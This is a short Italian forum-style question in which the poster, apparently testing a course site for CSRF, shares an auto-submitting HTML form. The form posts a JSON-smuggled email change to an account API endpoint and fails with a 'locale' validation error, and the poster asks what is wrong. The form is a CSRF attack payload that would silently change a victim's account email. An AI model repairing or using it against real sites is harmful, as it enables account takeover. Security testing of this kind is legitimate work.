Quindi sto testando questo sito per corsi e penso che potrebbe essere vulnerabile CSRF tuttavia, quando provo a fare una richiesta di post ottengo un errore di convalida che dice che "locale" è richiesto nonostante io specificandolo nella richiesta. Ecco il codice sorgente del modulo.
<html>
<head>
</head>
<body>
<form action="http://account.testbank.com/api/account/v1/user/email" method="post" enctype='applicatiom/json'>
<input name='{"email":"[email protected]" ,"locale": "en"}'>
<input type="hidden" name="locale" id="locale" value="en-US">
<script> document.forms[0].submit()</script>
</form>
</body>
</html>
Che cosa sto sbagliando?